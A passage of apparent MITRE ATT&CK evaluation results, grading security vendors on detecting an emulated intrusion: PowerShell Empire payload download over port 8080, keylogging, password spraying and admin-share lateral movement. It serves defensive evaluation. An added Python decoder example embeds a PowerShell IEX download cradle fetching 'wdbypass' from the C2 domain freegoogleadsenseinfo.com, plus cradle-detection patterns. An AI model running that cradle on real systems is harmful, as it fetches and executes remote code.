No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry (Tainted)
Telemetry showed a network connection to 192.168.0.5 (C2 server) over port 8080 as well as decoded PowerShell making a connection over port 8080 with an HTTP request to download the wdbypass payload (tainted by alert on suspicious PowerShell command-line arguments). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5] [6]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for powershell.exe executed as a PowerShell downloader. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and the Technique (Standard Application Layer Protocol). Data also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with an HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry
Telemetry showed the decoded PowerShell extracted from the command-line arguments, which revealed a connection over port 8080 with an HTTP request to download the wdbypass payload. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched an HTTP GET request with an alert for PowerShell URL Request (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1071 - Standard Application Layer Protocol) and Tactic (Command and Control). [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass (tainted by the parent "Powershell executed encoded commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed a decoded PowerShell script invoked that created a web request to the C2 server with related data showing the connection was made (tainted by alert on suspicious PowerShell command-line arguments). [1] [2] [3] [4] [5]
Palo Alto Networks
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
Telemetry
Telemetry showed network connection to 192.168.0.5 (C2 server) over TCP port 8080. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry showed a network connection event to 192.168.0.5 (C2 server) on TCP port 8080 that was associated with the encoded PowerShell IEX command. [1] [2] [3] [4]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for powershell.exe executed as a PowerShell downloader. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and the Technique (Commonly Used Port). Data also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with an HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed powershell.exe making a network connection over port 8080. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
General Behavior
A General Behavior alert for Command and Control was triggered because of PowerShell making a connection over TCP port 8080. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the decoded PowerShell extracted from the command-line arguments, which revealed a connection over port 8080 with an HTTP request to download the wdbypass payload. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Telemetry (Tainted)
Telemetry showed a connection to freegoogleadsenseinfo.com (C2 domain) over TCP port 8080. The telemetry was tainted by the parent PowerShell URL Request (Weak Signal) alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire instance communicated with freegoogleadsenseinfo.com (C2 domain) over port 8080. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass. [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe making an HTTP GET request over port 8080 to freegoogleadsenseinfo.com (C2 domain) for the file wdbypass (tainted by the parent "Powershell executed encoded commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry
Telemetry showed a network connection to 192.168.0.5 (C2 server) over TCP port 8080. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed a connection to 192.168.0.5 (C2 server) on port 8080 was made (tainted by alert on suspicious PowerShell command-line arguments). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry
Telemetry showed an outgoing network connection to www.freegoogleadsenseinfo.com (C2 domain) over port 8080. [1] [2] [3] [4] [5] [6] [7]
RSA
Telemetry
Telemetry showed network connection to 192.168.0.5 (C2 server) over port 8080. Though it does not count as a detection, telemetry also showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed network connections over port 8080. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3]
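The McAfee, Palo Alto Networks, RSA and CrowdStrike notes in the Remote File Copy, Standard Application Layer Protocol and Commonly Used Port results above all make the same observation: the encoded PowerShell command line "could be decoded outside the capability" to reveal the IEX command that downloaded wdbypass over HTTP port 8080, and the decoding was not counted as a detection. The Python below is an added example of that analyst step, not code from MITRE or any vendor: it recovers the script from a -enc argument (base64 over UTF-16LE text) and pulls out the download-cradle tokens together with the host, port and path. The command line it runs on is constructed to reproduce the indicators on this page (www.freegoogleadsenseinfo.com, port 8080, the file wdbypass); the actual Empire launcher is longer and structured differently, and the flag regex covers only the common abbreviations of -EncodedCommand.

```python
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts abbreviations of -EncodedCommand; these are the common ones.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"(https?)://([^\s'\"/:]+)(?::(\d+))?(/[^\s'\"]*)?", re.I)
CRADLE_RE = re.compile(
    r"\b(IEX|Invoke-Expression|DownloadString|DownloadFile|DownloadData|"
    r"Invoke-WebRequest|Net\.WebClient)\b", re.I)

# Constructed decoded payload matching the indicators on this page (C2 domain,
# port 8080, file wdbypass); not the actual Empire launcher.
SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString("
          "'http://www.freegoogleadsenseinfo.com:8080/wdbypass')")


def encode_command(script: str) -> str:
    """What -EncodedCommand expects: UTF-16LE text, base64-encoded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line of the shape the telemetry screenshots describe.
SAMPLE_CMDLINE = "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_command(SCRIPT)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script from a -enc command line, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_indicators(script: str) -> Dict[str, object]:
    """Pull download-cradle tokens and URL components (host, port, path) from a script."""
    urls: List[Dict[str, object]] = []
    for scheme, host, port, path in URL_RE.findall(script):
        urls.append({
            "host": host,
            "port": int(port) if port else (443 if scheme.lower() == "https" else 80),
            "path": path or "/",
        })
    cradle = sorted({m.group(1) for m in CRADLE_RE.finditer(script)})
    return {"cradle": cradle, "urls": urls}


def analyze(cmdline: str) -> Optional[Dict[str, object]]:
    """Decode and extract in one step, for use over process-creation telemetry."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    result = extract_indicators(script)
    result["script"] = script
    return result


if __name__ == "__main__":
    print(analyze(SAMPLE_CMDLINE))
```

Decoding gives the analyst the destination and port directly from the process event, which is what lets the Commonly Used Port and Standard Application Layer Protocol observations be tied to the powershell.exe process even when the sensor itself only recorded the raw network connection.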
Carbon Black
Enrichment
The capability enriched the events with a tag titled "PowerShell Input Capture -keylogger" based on known modloads that could be potentially abused to provide keylogger functionality. [1] [2]
Telemetry
Telemetry showed modloads associated with the execution of a keylogger. [1] [2]
CrowdStrike
Telemetry
Telemetry showed the decoded PowerShell script, which displayed the function Get-Keystrokes. [1] [2] [3] [4]
General Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was identified because they observed the adversary logging keystrokes based on the GetKeystrokes PowerShell function. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Cybereason
Indicator of Compromise
An Indicator of Compromise alert was generated based on the execution of a malicious command in PowerShell named Get-Keystrokes. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed modloads associated with the execution of a keylogger. [1] [2] [3] [4] [5] [6]
Endgame
None
No detection capability demonstrated for this procedure, though the capability pulled PowerShell Script Block logs from the host to show the execution of Get-KeyStrokes. [1] [2] [3]
FireEye
None
No detection capability demonstrated for this procedure, though the capability detected PowerShell activity during the time of the keylogging. [1]
F-Secure
Telemetry
Telemetry showed powershell.exe executing the GetAsyncKeyState method, indicating keylogging. [1] [2]
Enrichment
The capability enriched powershell.exe with a tag indicating .NET keylogging. [1] [2]
GoSecure
None
No detection capability demonstrated for this procedure. The vendor noted the capability can create a new condition that would track all actions on a certain file of interest. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
None
No detection capability demonstrated for this procedure. [1]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe making API calls consistent with keylogger behavior. Telemetry also showed execution of Get-Keystrokes Empire PowerShell cmdlet (tainted by alert on PowerShell script with suspicious content). Vendor stated that Input Capture telemetry is captured but it was not immediately visible in the portal. Vendor made changes to the portal during the test to enable by default the visibility of these events. [1] [2] [3] [4] [5] [6] [7]
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated on keylogging activity in powershell.exe. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched the execution of a specific API call as keylogging and suspicious activity. [1] [2] [3] [4] [5]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script logging keys pressed, time, and the active window. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Enrichment (Tainted)
The capability enriched data collected as keylogging behavior that was not visible through the standard interface during the evaluation. The capability associated the keylogging event to the parent Group ID even though it is not visible in the data provided. [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Telemetry
Telemetry showed the decoded PowerShell script, which displayed the API call GetForegroundWindow to enumerate the active window. [1]
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe executing the GetForegroundWindow method. [1]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script logging keys pressed, time, and the active window. [1] [2]
Telemetry
Telemetry showed the decoded PowerShell script, which includes the API call GetForegroundWindow to enumerate the active window. [1] [2]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because IT_tasks.txt was retrieved from a network share as a file of interest. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Telemetry
Telemetry showed a file read event for IT_tasks.txt by powershell.exe as well as a FsPostOpen event indicating IT_tasks.txt was opened. [1] [2] [3]
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure. Had malicious access to it_tasks been detected, response actions allow file retrieval which could have identified credentials in files.
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe executing the Get-Content cmdlet on IT_tasks.txt. [1]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure, though telemetry was available that showed execution of Get-Content PowerShell cmdlet. Data does not show what file the cmdlet was executed on. [1]
Palo Alto Networks
Telemetry
Telemetry showed a file read event for IT_tasks.txt. [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Enrichment (Configuration Change)
The capability enriched individual net.exe events with tagging titled "Credential Access using Admin Shares - Failed Attempts". The capability was modified after the start of the evaluation enabling enrichment to appear, so the detection is identified as a configuration change. [1] [2] [3] [4]
Telemetry
Telemetry showed a process tree containing repeated logon attempts via net.exe and command-line arguments indicative of password spraying. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated General Behavior alerts indicating the net use commands were suspicious. The alerts were tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, including details that the logons were for local admin (type 6) and that they failed. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Enrichment (Tainted)
The capability enriched net.exe execution with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Endgame
Enrichment (Tainted)
The capability enriched each individual net.exe logon attempt with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactics (Execution, Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Telemetry (Configuration Change)
Telemetry showed the logon failure from Kmitnick by searching for Windows Security Log Event ID 4625. A configuration change was made to allow for the capture of Windows Security Event ID 4625. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the attacker attempted to access systems using four accounts. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched repeated logon attempts via net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1077 - Windows Admin Share) and Tactic (Lateral Movement). The four events were included under the same alert and each of the passwords was redacted by the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquisition data. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Enrichment
The capability enriched multiple occurrences of net.exe usage as indicative of brute forcing a remote system as well as the correct ATT&CK Technique ID (Brute Force). Screenshot is not available due to sensitivity of rule logic. [1] [2]
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying. [1] [2]
GoSecure
Enrichment (Tainted)
The capability enriched each individual net.exe logon attempt with the condition "Net User Reconnaissance Command". The enrichment was tainted by the parent "Powershell executed remote commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing repeated logon attempts via net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated for powershell.exe performing a potential brute force password hack via the net utility. [1] [2] [3] [4]
Microsoft
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated based on a brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed failed authorization attempts due to bad passwords as indicated by a fallback request over WebDAV to port 80 on the C2 server, but did not indicate the two failed access attempts on Morris and Conficker that were due to the accounts having insufficient access on the systems. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Palo Alto Networks
General Behavior
A General Behavior alert was generated for the mapping of sensitive administrative shares by an unexpected parent process. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). The log files showed an exit code of 0x2, which indicates a logon failure but does not differentiate between bad credentials and access denied to the resource. [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry showed a process tree containing repeated logon attempts via net.exe targeting ADMIN$. [1] [2] [3] [4] [5] [6]
Specific Behavior
Specific Behavior alerts titled "Windows Admin Shares - Lateral Movement" were generated for credential accesses specifically targeting admin shares. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments targeting ADMIN$ shares on the machines 10.0.1.4 (Morris) and 10.0.1.6 (Nimda). [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated General Behavior alerts indicating the net use commands attempting logon to ADMIN$ shares were suspicious. The alerts were tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was triggered for each individual net.exe connection with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5] [6]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). The four events were included under the same alert. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
Specific Behavior alerts were generated for net.exe connecting to a remote administrative share. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Enrichment (Tainted)
The capability enriched individual net.exe logon attempts targeting ADMIN$ with the condition "Net User Reconnaissance Command". The enrichment was tainted by the parent "Powershell executed remote commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6] [7]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing repeated logon attempts targeting ADMIN$ via net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed repeated logon attempts to ADMIN$ via net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed failed authorization attempts due to bad passwords as indicated by a fallback request over WebDAV to port 80 on the C2 server, but did not indicate the two failed access attempts on Morris and Conficker that were due to the accounts having insufficient access on the systems. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated based on a brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated for a net.exe logon attempt to ADMIN$. The alert was tagged with the correct ATT&CK Technique (Windows Admin Shares). [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). The log files showed an exit code of 0x2, which indicates a logon failure but does not differentiate between bad credentials and access denied to the resource. [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry showed a process tree containing a successful logon via net.exe. [1] [2] [3] [4] [5]
CrowdStrike
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection. [1] [2] [3] [4]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Enrichment (Tainted)
The capability enriched a logon attempt via net.exe, using the valid credentials of user Kmitnick, with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert. [1] [2] [3]
Endgame
Enrichment (Tainted)
The capability enriched the net.exe connection using valid credentials for Kmitnick with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments using valid credentials for user Kmitnick (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactics (Execution, Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched a logon attempt via net.exe using valid credentials for user Kmitnick with an alert for Net Use Command Execution (Weak Signal). The password for Kmitnick was redacted within the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquisition data. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed the successful logon for the user Kmitnick. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick. Telemetry also showed a logon event for user Kmitnick on Conficker (10.0.0.5). [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick. The telemetry was tainted by the parent "Powershell executed remote commands" alert. Telemetry also showed explorer.exe (as the user Bob) write a PIPE on Conficker, which could indicate to an analyst that the share had been successfully mounted. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to login using the valid credentials of user Kmitnick. The telemetry was tainted by a trace detection on powershell.exe. Telemetry also showed a login event on Conficker (10.0.0.5) for user Kmitnick. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). Telemetry showed Kmitnick login event on 10.0.0.5 (Conficker) and that 10.0.1.5 (CodeRed) accessed resources on 10.0.0.5 (Conficker). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Enrichment
The capability enriched an lsass.exe event with the correct ATT&CK Technique (Valid Accounts). [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) using valid credentials for user Kmitnick followed by an event for the credentials being validated by the DC. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed a logon attempt via net.exe and command-line arguments using valid credentials of user Kmitnick. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed a logon attempt using valid credentials of user Kmitnick via net.exe and command-line arguments (tainted by relationship to threat story). The log files showed an exit code of 0x2, which indicates a logon failure but does not differentiate between bad credentials and access denied to the resource. [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry showed a process tree containing repeated logon attempts via net.exe targeting ADMIN$, eventually resulting in a successful logon. [1] [2] [3] [4] [5] [6]
Specific Behavior
Specific Behavior alerts were generated mapped to the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) for successful logons. [1] [2] [3] [4] [5] [6]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect to ADMIN$ on 10.0.0.5 (Conficker) as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
